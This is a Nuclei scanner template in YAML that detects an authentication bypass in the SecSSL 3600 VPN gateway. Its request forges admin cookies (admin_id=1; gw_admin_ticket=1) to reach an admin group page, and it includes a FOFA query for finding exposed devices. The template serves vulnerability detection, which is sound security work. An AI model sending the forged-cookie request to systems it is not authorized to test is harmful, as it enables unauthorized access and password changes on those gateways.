45 lines
1.5 KiB
YAML
Executable File
45 lines
1.5 KiB
YAML
Executable File
id: secsslvpn-auth-bypass
|
|
|
|
info:
|
|
name: Secure Access Gateway SecSSLVPN - Authentication Bypass
|
|
author: SleepingBag945
|
|
severity: high
|
|
description: |
|
|
The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
|
|
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: app="安全接入网关SecSSLVPN"
|
|
tags: secsslvpn,auth-bypass
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/group/x_group.php?id=1"
|
|
|
|
headers:
|
|
Cookie: admin_id=1; gw_admin_ticket=1;
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "group_action.php"
|
|
- "anonymous"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100c67640436f725deaf4e9f4f97fa738b8f306d42c14e9a45fa34f3acfd33f72cb022100f195f8dfbf0ab067af2d4a69ce9a43d289ad33210afd2bf4d35a2a3cae527897:922c64590222798bb761d5b6d8e72950
|